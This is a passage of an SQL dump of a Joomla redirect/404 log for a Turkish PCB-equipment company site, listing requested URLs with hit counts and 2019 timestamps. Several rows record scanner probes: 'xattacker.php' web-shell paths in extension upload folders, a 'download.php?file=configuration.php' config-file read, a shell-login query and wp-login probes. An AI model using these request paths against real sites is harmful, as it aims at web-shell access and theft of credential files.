00:00:00',301),(23327,'https://mail.3s-technologies.com.tr/tr/pcb-yükseklik-self-levelling',NULL,'','',2,0,'2019-09-19 17:58:42','0000-00-00 00:00:00',301),(23328,'https://mail.3s-technologies.com.tr/en/pcb-prototip-prototyping',NULL,'','',8,0,'2019-09-19 18:05:32','0000-00-00 00:00:00',301),(23329,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping',NULL,'','',1304,0,'2019-09-19 18:16:12','0000-00-00 00:00:00',301),(23330,'http://www.3s-technologies.com.tr/index.php/en/welcome',NULL,'','',9,0,'2019-09-19 19:12:33','0000-00-00 00:00:00',301),(23331,'https://www.3s-technologies.com.tr/en/pcb-delikler-holes',NULL,'','',8,0,'2019-09-19 19:13:45','0000-00-00 00:00:00',301),(23332,'https://mail.3s-technologies.com.tr/tr/pcb-kazıma-milling',NULL,'','',2,0,'2019-09-19 19:50:52','0000-00-00 00:00:00',301),(23333,'https://mail.3s-technologies.com.tr/tr/pcb-non-copper',NULL,'','',2,0,'2019-09-19 21:00:10','0000-00-00 00:00:00',301),(23334,'http://www.3s-technologies.com.tr/tr/pcb-yükseklik-self-levelling',NULL,'','',15,0,'2019-09-19 21:14:45','0000-00-00 00:00:00',301),(23335,'https://mail.3s-technologies.com.tr/tr/pcb-outline',NULL,'','',2,0,'2019-09-19 21:19:47','0000-00-00 00:00:00',301),(23336,'http://www.3s-technologies.com.tr/en/pcb-yükseklik-self-levelling',NULL,'','',2,0,'2019-09-19 21:25:36','0000-00-00 00:00:00',301),(23337,'https://www.3s-technologies.com.tr/tr/videolar',NULL,'','',8,0,'2019-09-19 21:36:12','0000-00-00 00:00:00',301),(23338,'https://www.3s-technologies.com.tr/tr/pcb-outline',NULL,'','',7,0,'2019-09-19 21:56:54','0000-00-00 00:00:00',301),(23339,'https://www.3s-technologies.com.tr/tr/pcb-kazıma-milling',NULL,'','',7,0,'2019-09-19 22:51:23','0000-00-00 00:00:00',301),(23340,'https://www.3s-technologies.com.tr/en/pcb-outline',NULL,'','',7,0,'2019-09-19 23:02:26','0000-00-00 00:00:00',301),(23341,'http://mail.3s-technologies.com.tr/en/pcb-outline',NULL,'','',2,0,'2019-09-19 23:09:55','0000-00-00 00:00:00',301),(23342,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/34-pinnacles',NULL,'','',4,0,'2019-09-20 00:21:22','0000-00-00 00:00:00',301),(23343,'https://mail.3s-technologies.com.tr/en/pcb-yükseklik-self-levelling',NULL,'','',2,0,'2019-09-20 00:34:55','0000-00-00 00:00:00',301),(23344,'https://www.3s-technologies.com.tr/tr/pcb-milling',NULL,'','',7,0,'2019-09-20 01:01:33','0000-00-00 00:00:00',301),(23345,'http://3s-technologies.com.tr/tr/pcb-delikler-holes',NULL,'','',9,0,'2019-09-20 01:14:20','0000-00-00 00:00:00',301),(23346,'http://3s-technologies.com.tr/tr/xattacker.gif',NULL,'','',3,0,'2019-09-20 19:24:26','0000-00-00 00:00:00',301),(23347,'http://3s-technologies.com.tr/tr/images/xattacker.txt',NULL,'','',3,0,'2019-09-20 19:24:27','0000-00-00 00:00:00',301),(23348,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/xattacker.php.j?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:28','0000-00-00 00:00:00',301),(23349,'http://3s-technologies.com.tr/tr/media/xattacker.php?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:30','0000-00-00 00:00:00',301),(23350,'http://3s-technologies.com.tr/tr/media/xattacker.txt',NULL,'','',3,0,'2019-09-20 19:24:31','0000-00-00 00:00:00',301),(23351,'http://3s-technologies.com.tr/tr/xattacker.txt',NULL,'','',3,0,'2019-09-20 19:24:34','0000-00-00 00:00:00',301),(23352,'http://3s-technologies.com.tr/tr/tmp/plupload/xattacker.html',NULL,'','',3,0,'2019-09-20 19:24:35','0000-00-00 00:00:00',301),(23353,'http://3s-technologies.com.tr/tr/images/xattacker.gif',NULL,'','',3,0,'2019-09-20 19:24:40','0000-00-00 00:00:00',301),(23354,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/xattacker.php?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:41','0000-00-00 00:00:00',301),(23355,'http://3s-technologies.com.tr/tr/com_sexycontactform/fileupload/files/xattacker.php?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:42','0000-00-00 00:00:00',301),(23356,'http://3s-technologies.com.tr/tr/images/stories/xattacker.php.xxxjpg?x=attacker',NULL,'','',6,0,'2019-09-20 19:24:43','0000-00-00 00:00:00',301),(23357,'http://3s-technologies.com.tr/tr/jwallpapers_files/plupload/xattacker.php?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:46','0000-00-00 00:00:00',301),(23358,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/xattacker.php?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:46','0000-00-00 00:00:00',301),(23359,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/xattacker.php?x=attacker',NULL,'','',3,0,'2019-09-20 19:24:48','0000-00-00 00:00:00',301),(23360,'http://3s-technologies.com.tr/index.php/tr/directions',NULL,'','',3,0,'2019-09-21 00:24:16','0000-00-00 00:00:00',301),(23361,'http://www.3s-technologies.com.tr/en/welcome',NULL,'','',15,0,'2019-09-21 01:45:19','0000-00-00 00:00:00',301),(23362,'http://www.3s-technologies.com.tr/en/images/slideshow/0-cm602_cm101.jpg',NULL,'https://www.google.com/','',2,0,'2019-09-21 11:33:45','0000-00-00 00:00:00',301),(23363,'http://3s-technologies.com.tr/en/pcb-prototip-prototyping/',NULL,'','',9,0,'2019-09-21 14:58:21','0000-00-00 00:00:00',301),(23364,'http://3s-technologies.com.tr/tr/80-turkish-tr/',NULL,'','',9,0,'2019-09-21 15:00:11','0000-00-00 00:00:00',301),(23365,'http://3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/',NULL,'','',9,0,'2019-09-21 15:00:11','0000-00-00 00:00:00',301),(23366,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/64-blue-mountain-rain-forest',NULL,'','',8,0,'2019-09-21 15:05:23','0000-00-00 00:00:00',301),(23367,'http://3s-technologies.com.tr/tr/download.php?file=configuration.php',NULL,'','',1,0,'2019-09-21 20:15:45','0000-00-00 00:00:00',301),(23368,'http://mail.3s-technologies.com.tr/tr/manager/ldskflks',NULL,'http://mail.3s-technologies.com.tr/manager/ldskflks','',2,0,'2019-09-21 20:23:27','0000-00-00 00:00:00',301),(23369,'http://mail.3s-technologies.com.tr/tr/manager/index.php',NULL,'http://mail.3s-technologies.com.tr/manager/index.php','',2,0,'2019-09-21 20:23:27','0000-00-00 00:00:00',301),(23370,'http://www.3s-technologies.com.tr/index.php/en/growers?format=feed&type=atom',NULL,'','',2,0,'2019-09-22 01:51:42','0000-00-00 00:00:00',301),(23371,'http://3s-technologies.com.tr/en/parks-home',NULL,'','',10,0,'2019-09-22 03:14:39','0000-00-00 00:00:00',301),(23372,'http://www.3s-technologies.com.tr/tr/css/bootstrap.min.css',NULL,'http://www.3s-technologies.com.tr/tr/','',1,0,'2019-09-22 09:17:53','0000-00-00 00:00:00',301),(23373,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/34-pinnacles',NULL,'','',10,0,'2019-09-22 14:34:09','0000-00-00 00:00:00',301),(23374,'http://www.3s-technologies.com.tr/en/image-gallery',NULL,'','',14,0,'2019-09-22 17:09:58','0000-00-00 00:00:00',301),(23375,'http://www.3s-technologies.com.tr/index.php/tr/growers?format=feed&type=atom',NULL,'','',3,0,'2019-09-22 18:32:34','0000-00-00 00:00:00',301),(23376,'http://www.3s-technologies.com.tr/en/image-gallery/animals',NULL,'','',59,0,'2019-09-22 22:59:55','0000-00-00 00:00:00',301),(23377,'http://www.3s-technologies.com.tr/index.php/tr/directions',NULL,'','',8,0,'2019-09-23 06:00:46','0000-00-00 00:00:00',301),(23378,'https://3s-technologies.com.tr/tr/images/slideshow/0-cm602_cm101.jpg',NULL,'','',1,0,'2019-09-23 06:45:50','0000-00-00 00:00:00',301),(23379,'http://www.3s-technologies.com.tr/en/image-gallery/scenery',NULL,'','',61,0,'2019-09-23 12:23:07','0000-00-00 00:00:00',301),(23380,'http://www.3s-technologies.com.tr/en/image-gallery/scenery/65-ormiston-pound',NULL,'','',14,0,'2019-09-23 13:00:05','0000-00-00 00:00:00',301),(23381,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/park-blog?format=feed&type=atom',NULL,'','',1,0,'2019-09-23 22:26:52','0000-00-00 00:00:00',301),(23382,'http://www.3s-technologies.com.tr/tr/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'','',1,0,'2019-09-24 02:53:51','0000-00-00 00:00:00',301),(23383,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-non-copper',NULL,'','',1,0,'2019-09-24 15:03:02','0000-00-00 00:00:00',301),(23384,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/park-blog',NULL,'','',6,0,'2019-09-24 16:01:24','0000-00-00 00:00:00',301),(23385,'http://www.3s-technologies.com.tr/index.php/en/growers?format=feed&type=rss',NULL,'','',4,0,'2019-09-24 18:52:21','0000-00-00 00:00:00',301),(23386,'http://www.3s-technologies.com.tr/en/?itemid=429',NULL,'','',38,0,'2019-09-24 20:30:57','0000-00-00 00:00:00',301),(23387,'http://www.3s-technologies.com.tr/tr/pfugyprttie.html',NULL,'','',1,0,'2019-09-25 00:19:54','0000-00-00 00:00:00',301),(23388,'http://www.3s-technologies.com.tr/en/growers',NULL,'','',61,0,'2019-09-25 00:42:27','0000-00-00 00:00:00',301),(23389,'http://www.3s-technologies.com.tr/en/?itemid=243',NULL,'','',43,0,'2019-09-25 01:54:19','0000-00-00 00:00:00',301),(23390,'http://www.3s-technologies.com.tr/tr/?itemid=429',NULL,'','',58,0,'2019-09-25 03:11:22','0000-00-00 00:00:00',301),(23391,'http://www.3s-technologies.com.tr/tr/?itemid=243',NULL,'','',67,0,'2019-09-25 04:27:40','0000-00-00 00:00:00',301),(23392,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-milling',NULL,'','',3,0,'2019-09-25 09:43:19','0000-00-00 00:00:00',301),(23393,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-kazıma-milling',NULL,'','',10,0,'2019-09-25 11:56:23','0000-00-00 00:00:00',301),(23394,'http://www.3s-technologies.com.tr/index.php/en/parks-home',NULL,'','',8,0,'2019-09-25 11:57:34','0000-00-00 00:00:00',301),(23395,'http://3s-technologies.com.tr/en/image-gallery/scenery?format=feed&type=atom',NULL,'','',1,0,'2019-09-25 20:13:33','0000-00-00 00:00:00',301),(23396,'http://3s-technologies.com.tr/tr/ehoxgkpilfglchk.html',NULL,'','',1,0,'2019-09-26 00:07:38','0000-00-00 00:00:00',301),(23397,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-yükseklik-self-levelling',NULL,'','',6,0,'2019-09-26 00:34:05','0000-00-00 00:00:00',301),(23398,'http://3s-technologies.com.tr//administrator/components/com_extplorer/uploadhandler.php',NULL,'','',1,0,'2019-09-26 03:47:44','0000-00-00 00:00:00',301),(23399,'http://3s-technologies.com.tr/tr/news/wp-login.php',NULL,'http://3s-technologies.com.tr/news/wp-login.php','',5,0,'2019-09-26 12:00:48','0000-00-00 00:00:00',301),(23400,'http://3s-technologies.com.tr/index.php/en/parks-home',NULL,'','',10,0,'2019-09-26 19:16:30','0000-00-00 00:00:00',301),(23401,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-delikler-holes',NULL,'','',6,0,'2019-09-27 01:42:17','0000-00-00 00:00:00',301),(23402,'http://www.3s-technologies.com.tr/tr/directions',NULL,'','',7,0,'2019-09-27 08:52:14','0000-00-00 00:00:00',301),(23403,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=45&itemid=29&lang=tr',NULL,'','',1,0,'2019-09-27 09:57:01','0000-00-00 00:00:00',301),(23404,'http://3s-technologies.com.tr/en/image-gallery/animals?format=feed&type=rss',NULL,'','',1,0,'2019-09-27 12:53:46','0000-00-00 00:00:00',301),(23405,'http://3s-technologies.com.tr/en/growers?format=feed&type=atom',NULL,'','',1,0,'2019-09-27 13:53:04','0000-00-00 00:00:00',301),(23406,'http://www.3s-technologies.com.tr/index.php/tr/growers?format=feed&type=rss',NULL,'','',1,0,'2019-09-28 08:24:12','0000-00-00 00:00:00',301),(23407,'http://3s-technologies.com.tr/en/image-gallery/animals?format=feed&type=atom',NULL,'','',2,0,'2019-09-28 12:33:57','0000-00-00 00:00:00',301),(23408,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr//images/stories/crimeirc.gif',NULL,'','',1,0,'2019-09-28 23:30:17','0000-00-00 00:00:00',301),(23409,'https://3s-technologies.com.tr/tr/favicon.ico',NULL,'','',64,0,'2019-09-29 08:06:52','0000-00-00 00:00:00',301),(23410,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-kazıma-milling',NULL,'','',1,0,'2019-09-29 08:32:08','0000-00-00 00:00:00',301),(23411,'http://3s-technologies.com.tr/tr/growers',NULL,'','',55,0,'2019-09-29 13:27:45','0000-00-00 00:00:00',301),(23412,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',9,0,'2019-09-30 12:18:34','0000-00-00 00:00:00',301),(23413,'http://3s-technologies.com.tr/en/image-gallery/animals',NULL,'','',53,0,'2019-09-30 20:07:52','0000-00-00 00:00:00',301),(23414,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-outline',NULL,'','',6,0,'2019-09-30 22:16:31','0000-00-00 00:00:00',301),(23415,'http://3s-technologies.com.tr/tr/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:38:53','0000-00-00 00:00:00',301),(23416,'http://3s-technologies.com.tr/tr/vb/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:39:00','0000-00-00 00:00:00',301),(23417,'http://3s-technologies.com.tr/tr/vb5/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:39:08','0000-00-00 00:00:00',301),(23418,'http://3s-technologies.com.tr/tr/forum/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:40:08','0000-00-00 00:00:00',301),(23419,'http://3s-technologies.com.tr/tr/vbulletin/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:41:59','0000-00-00 00:00:00',301),(23420,'http://3s-technologies.com.tr/tr/vbforum/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:42:58','0000-00-00 00:00:00',301),(23421,'http://3s-technologies.com.tr/tr/forums/js/ajax.js',NULL,'3s-technologies.com.tr','',1,0,'2019-10-01 04:43:41','0000-00-00 00:00:00',301),(23422,'http://3s-technologies.com.tr/en/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',15,0,'2019-10-01 07:53:58','0000-00-00 00:00:00',301),(23423,'http://3s-technologies.com.tr/en/image-gallery',NULL,'','',13,0,'2019-10-01 11:20:51','0000-00-00 00:00:00',301),(23424,'http://3s-technologies.com.tr/en/park-blog',NULL,'','',57,0,'2019-10-01 11:20:56','0000-00-00 00:00:00',301),(23425,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=64&itemid=86&lang=tr',NULL,'','',3,0,'2019-10-01 11:30:45','0000-00-00 00:00:00',301),(23426,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',2,0,'2019-10-01 11:33:57','0000-00-00 00:00:00',301),(23427,'http://3s-technologies.com.tr/tr/directions',NULL,'','',6,0,'2019-10-01 15:40:11','0000-00-00 00:00:00',301),(23428,'http://www.3s-technologies.com.tr/tr/bopmyxmwfixz.html',NULL,'','',1,0,'2019-10-01 23:13:18','0000-00-00 00:00:00',301),(23429,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/welcome',NULL,'','',1,0,'2019-10-02 01:26:15','0000-00-00 00:00:00',301),(23430,'http://3s-technologies.com.tr/en/image-gallery/scenery/34-pinnacles',NULL,'','',10,0,'2019-10-02 01:49:44','0000-00-00 00:00:00',301),(23431,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/videolar',NULL,'','',1,0,'2019-10-02 03:21:29','0000-00-00 00:00:00',301),(23432,'http://3s-technologies.com.tr/en/growers',NULL,'','',52,0,'2019-10-02 05:46:31','0000-00-00 00:00:00',301),(23433,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-non-copper',NULL,'','',12,0,'2019-10-02 13:41:14','0000-00-00 00:00:00',301),(23434,'http://3s-technologies.com.tr/en/image-gallery/scenery/64-blue-mountain-rain-forest',NULL,'','',10,0,'2019-10-02 16:48:17','0000-00-00 00:00:00',301),(23435,'http://3s-technologies.com.tr/tr/qitrzgqdgmvkmaq.html',NULL,'','',1,0,'2019-10-02 23:04:57','0000-00-00 00:00:00',301),(23436,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-outline',NULL,'','',5,0,'2019-10-03 02:31:22','0000-00-00 00:00:00',301),(23437,'http://3s-technologies.com.tr/en/image-gallery/scenery',NULL,'','',90,0,'2019-10-03 04:29:43','0000-00-00 00:00:00',301),(23438,'http://3s-technologies.com.tr/en/image-gallery/scenery/65-ormiston-pound',NULL,'','',8,0,'2019-10-03 07:11:43','0000-00-00 00:00:00',301),(23439,'http://3s-technologies.com.tr/en/welcome',NULL,'','',8,0,'2019-10-03 12:14:55','0000-00-00 00:00:00',301),(23440,'http://3s-technologies.com.tr/tr/?option=com_biblestudy&view=mediafileform&layout=edit&id=1',NULL,'','',2,0,'2019-10-03 18:07:04','0000-00-00 00:00:00',301),(23441,'http://3s-technologies.com.tr/tr/?option=com_jssupportticket',NULL,'','',2,0,'2019-10-03 18:07:15','0000-00-00 00:00:00',301),(23442,'http://3s-technologies.com.tr/tr/drypyn.php',NULL,'','',1,0,'2019-10-04 22:11:19','0000-00-00 00:00:00',301),(23443,'http://3s-technologies.com.tr/en/?itemid=429',NULL,'','',26,0,'2019-10-04 23:28:39','0000-00-00 00:00:00',301),(23444,'http://3s-technologies.com.tr/en/?itemid=243',NULL,'','',29,0,'2019-10-05 01:13:40','0000-00-00 00:00:00',301),(23445,'http://3s-technologies.com.tr/tr/media/joomla-update.php',NULL,'','',1,0,'2019-10-05 02:10:13','0000-00-00 00:00:00',301),(23446,'http://3s-technologies.com.tr/tr/?itemid=243',NULL,'','',37,0,'2019-10-05 08:10:17','0000-00-00 00:00:00',301),(23447,'http://3s-technologies.com.tr/tr/?itemid=429',NULL,'','',36,0,'2019-10-05 09:37:07','0000-00-00 00:00:00',301),(23448,'http://www.3s-technologies.com.tr/tr/&nx=242&ny=18&clkt=23&bg=!ra6lrrzyuqsbrwwjqs8caaabhliaaabkmqgqrewuhutvubexipphswjuo8rlpe9gqbpvxgqlkwqkkgs7jcb0t7fkl6synnhirfdragvj6sreavarwgbck5hcdjpx-2apudic_2m2ecujojd1_hk2v4k5jvegis4xkcodf6fv-wttoxdxrnepj0zeckugq4i3xfeid3xqq4hlqcbxi-bafbyjxqrr7ifgokd2rlulrraito895r9_6dwuviw_7v8xunsrv_valapv59hytmud2zuly9xb3sw2_d9x7zvp2ngb0osgtlh1rjh46lxcazndrqkjzdt_fezodxbaekbgblhpblwkv-hqbubdew-hokvara8ul4bm7jb2oqfj4vpa1vt2qkmrisizd1cnqydqbe4p6ckzllal6xyqgohqeoxlkc5kk8vwapa6blslkrkmfblagozq_mfjcg0xkzgqvilkwqibqe-kreyrlr1ofhpb0tzd73zd920-i2kraq_ro5y7gqww854qbefihdz-tiqa9wndyf5xkgnkxsvjuymz4rm9rya8fsblqmjrsbnvn7eax-ja1k6bw0prp8lb66u7ctnn',NULL,'https://www.google.com/','',1,0,'2019-10-05 19:51:45','0000-00-00 00:00:00',301),(23449,'http://www.3s-technologies.com.tr/tr/images/slideshow/0-cm602_cm101.jpg',NULL,'','',14,0,'2019-10-07 06:54:10','0000-00-00 00:00:00',301),(23450,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'https://3s-technologies.com.tr/tr/','',3439,0,'2019-10-07 12:11:00','0000-00-00 00:00:00',301),(23451,'http://www.3s-technologies.com.tr/index.php/tr/growers',NULL,'','',11,0,'2019-10-07 16:14:48','0000-00-00 00:00:00',301),(23452,'http://www.3s-technologies.com.tr/tr/&nx=217&ny=33&clkt=32&bg=!rkwlrv1yvkmbgre1epucaaaa0fiaaabsmqgjyyt_tl7egdi2kqhdeo5zglvdkagxmzfph1xr3-igbqmjzcf_mrrwh-qnpzd0bcy_hrw-w9kebyf4dpinmbm8dw1eallrtdbwiwijnilrflybpruayd3atiteieesf8vqi7liqipi6qkzffn6x0axd_eg5u_qtavo64qrk6zr_1kdyp2pjnd5hsvffdgtuxgfnenm0w9hvxv7tbdnniunobfike9fl3oi0sqezltcqivgdexvl7dbor1s-9s3bmbbhf5bllenehtdqvi4l7dhyfswmxgw-6df7n0uieydxdzrfmbolqsu-kauf_hua9p_kntttivsuronjmpc-iadlh4ukialeuuuynvueda8ch2xrftdhr5y2ho_lxxtmhwr4rj5kaykom6mmcj56i8fbc3jkim1mpw6z3fpgycleoiidzpw5qohoy70_l3qcpuez3gwvclt8pcxhfgvhxrmcd41xvmdltwkodqptldnmmdxzu_xihzyur9ed46e4s40qqvq-wae0j7z',NULL,'https://www.google.com/','',2,0,'2019-10-07 18:35:41','0000-00-00 00:00:00',301),(23453,'http://www.3s-technologies.com.tr/tr/&nx=217&ny=33&clkt=32&bg=!rkwlrv1yvkmbgre1epucaaaa0fiaaabsmqgjyyt_tl7egdi2kqhdeo5zglvdkagxmzfph1xr3-igbqmjzcf_mrrwh-qnpzd0bcy_hrw-w9kebyf4dpinmbm8dw1eallrtdbwiwijnilrflybpruayd3atiteieesf8vqi7liqipi6qkzffn6x0axd_eg5u_qtavo64qrk6zr_1kdyp2pjnd5hsvffdgtuxgfnenm0w9hvxv7tbdnniunobfike9fl3oi0sqezltcqivgdexvl7dbor1s-9s3bmbbhf5bllenehtdqvi4l7dhyfswmxgw-6df7n0uieydxdzrfmbolqsu-kauf_hua9p_kntttivsuronjmpc-iadlh4ukialeuuuynvueda8ch2xrftdhr5y2ho_lxxtmhwr4rj5kaykom6mmcj56i8fbc3jkim1mpw6z3fpgycleoiidzpw5qohoy70_l3qcpuez3gwvclt8pcxhfgvhxrmcd41xvmdltwkodqptldnmmdxzu_xihzyur9ed46e4s40qqvq-wae0j7z',NULL,'https://www.google.com/','',1,0,'2019-10-07 18:35:41','0000-00-00 00:00:00',301),(23454,'http://www.3s-technologies.com.tr/tr/bojxwnbhzepnj.html',NULL,'','',1,0,'2019-10-08 22:10:15','0000-00-00 00:00:00',301),(23455,'http://3s-technologies.com.tr/tr/sdcrxldcjysbobgs.html',NULL,'','',1,0,'2019-10-09 22:02:09','0000-00-00 00:00:00',301),(23456,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/directions',NULL,'','',1,0,'2019-10-10 02:20:00','0000-00-00 00:00:00',301),(23457,'http://www.3s-technologies.com.tr/index.php/en/directions',NULL,'','',7,0,'2019-10-10 18:26:59','0000-00-00 00:00:00',301),(23458,'http://3s-technologies.com.tr/tr/welcome',NULL,'','',13,0,'2019-10-10 23:26:52','0000-00-00 00:00:00',301),(23459,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping',NULL,'','',42,0,'2019-10-13 13:18:44','0000-00-00 00:00:00',301),(23460,'http://3s-technologies.com.tr/tr/components/com_search/models/controller.php?pass=jrc56h7a&login=go!',NULL,'','',1,0,'2019-10-15 20:35:12','0000-00-00 00:00:00',301),(23461,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-yükseklik-self-levelling',NULL,'','',1,0,'2019-10-15 21:18:25','0000-00-00 00:00:00',301),(23462,'http://www.3s-technologies.com.tr/tr/yfhdabpdchttbi.html',NULL,'','',1,0,'2019-10-15 21:44:39','0000-00-00 00:00:00',301),(23463,'http://3s-technologies.com.tr/tr/components/com_search/models/tools.php',NULL,'','',2,0,'2019-10-15 22:56:26','0000-00-00 00:00:00',301),(23464,'http://3s-technologies.com.tr/tr/cfgs.php',NULL,'','',1,0,'2019-10-15 23:24:59','0000-00-00 00:00:00',301),(23465,'http://www.3s-technologies.com.tr/en/directions',NULL,'','',9,0,'2019-10-16 16:04:20','0000-00-00 00:00:00',301),(23466,'http://3s-technologies.com.tr/tr/gkffwmcabjsj.html',NULL,'','',1,0,'2019-10-16 21:14:44','0000-00-00 00:00:00',301),(23467,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-10',NULL,'','',1,0,'2019-10-18 04:13:43','0000-00-00 00:00:00',301),(23468,'https://3s-technologies.com.tr/tr/images/urunler/t_mi300.jpg',NULL,'','',95,0,'2019-10-19 15:59:52','0000-00-00 00:00:00',301),(23469,'http://3s-technologies.com.tr/tr/backup/wp-login.php',NULL,'http://3s-technologies.com.tr/backup/wp-login.php','',6,0,'2019-10-19 18:04:41','0000-00-00 00:00:00',301),(23470,'http://3s-technologies.com.tr/tr/site/wp-login.php',NULL,'http://3s-technologies.com.tr/site/wp-login.php','',8,0,'2019-10-19 19:08:56','0000-00-00 00:00:00',301),(23471,'http://3s-technologies.com.tr/tr/web/wp-login.php',NULL,'http://3s-technologies.com.tr/web/wp-login.php','',15,0,'2019-10-19 20:14:20','0000-00-00 00:00:00',301),(23472,'http://3s-technologies.com.tr/tr/shop/wp-login.php',NULL,'http://3s-technologies.com.tr/shop/wp-login.php','',4,0,'2019-10-20 02:04:10','0000-00-00 00:00:00',301),(23473,'http://3s-technologies.com.tr/tr/2015/wp-login.php',NULL,'http://3s-technologies.com.tr/2015/wp-login.php','',1,0,'2019-10-20 03:19:38','0000-00-00 00:00:00',301),(23474,'http://3s-technologies.com.tr/tr/2016/wp-login.php',NULL,'http://3s-technologies.com.tr/2016/wp-login.php','',1,0,'2019-10-20 04:37:23','0000-00-00 00:00:00',301),(23475,'http://3s-technologies.com.tr/tr/2017/wp-login.php',NULL,'http://3s-technologies.com.tr/2017/wp-login.php','',1,0,'2019-10-20 05:56:54','0000-00-00 00:00:00',301),(23476,'http://www.3s-technologies.com.tr/tr/wvwjmmtlfvegstjx.html',NULL,'','',1,0,'2019-10-20 08:38:26','0000-00-00 00:00:00',301),(23477,'http://3s-technologies.com.tr/tr/hkbnwqoabtjnyv.html',NULL,'','',1,0,'2019-10-21 13:58:41','0000-00-00 00:00:00',301),(23478,'http://3s-technologies.com.tr/index.php/en/welcome',NULL,'','',4,0,'2019-10-22 06:35:38','0000-00-00 00:00:00',301),(23479,'http://3s-technologies.com.tr/en/accesson1.php',NULL,'3s-technologies.com.tr','',39,0,'2019-10-22 09:01:28','0000-00-00 00:00:00',301),(23480,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',8,0,'2019-10-22 15:34:54','0000-00-00 00:00:00',301),(23481,'https://3s-technologies.com.tr/tr/images/ddm/reflow ovens/spartan_8s.gif',NULL,'','',9,0,'2019-10-22 17:33:54','0000-00-00 00:00:00',301),(23482,'http://www.3s-technologies.com.tr/index.php/en/growers',NULL,'','',9,0,'2019-10-23 05:04:09','0000-00-00 00:00:00',301),(23483,'http://3s-technologies.com.tr/en/catalog/view/indess.php',NULL,'3s-technologies.com.tr','',1,0,'2019-10-23 15:27:31','0000-00-00 00:00:00',301),(23484,'http://3s-technologies.com.tr/en/directions',NULL,'','',3,0,'2019-10-24 21:07:03','0000-00-00 00:00:00',301),(23485,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/404',NULL,'','',3,0,'2019-10-26 12:57:42','0000-00-00 00:00:00',301),(23486,'http://www.3s-technologies.com.tr/tr/puvzhkkbpytie.html',NULL,'','',1,0,'2019-10-27 00:44:35','0000-00-00 00:00:00',301),(23487,'http://3s-technologies.com.tr/tr/fwfyhcrxznbl.html',NULL,'','',1,0,'2019-10-28 00:31:32','0000-00-00 00:00:00',301),(23488,'http://3s-technologies.com.tr/en/administrator/manifests/files/joomla.xml',NULL,'','',4,0,'2019-10-28 19:22:10','0000-00-00 00:00:00',301),(23489,'http://3s-technologies.com.tr/tr//index.php/component/users',NULL,'','',2,0,'2019-10-28 20:21:45','0000-00-00 00:00:00',301),(23490,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo',NULL,'','',3,0,'2019-10-29 12:43:04','0000-00-00 00:00:00',301),(23491,'https://www.3s-technologies.com.tr/tr/.well-known/apple-app-site-association',NULL,'','',106,0,'2019-10-29 14:24:12','0000-00-00 00:00:00',301),(23492,'http://www.3s-technologies.com.tr/tr/pcb-kazä±ma-milling',NULL,'','',2,0,'2019-10-29 14:56:21','0000-00-00 00:00:00',301),(23493,'http://www.3s-technologies.com.tr/tr/pcb-yã¼kseklik-self-levelling',NULL,'','',2,0,'2019-10-29 17:13:55','0000-00-00 00:00:00',301),(23494,'https://3s-technologies.com.tr/tr/administrator/components/com_jsjobs/com_jsjobs.xml',NULL,'','',1,0,'2019-10-30 00:57:02','0000-00-00 00:00:00',301),(23495,'http://3s-technologies.com.tr/en/index.php/component/users/',NULL,'','',9,0,'2019-10-30 06:17:44','0000-00-00 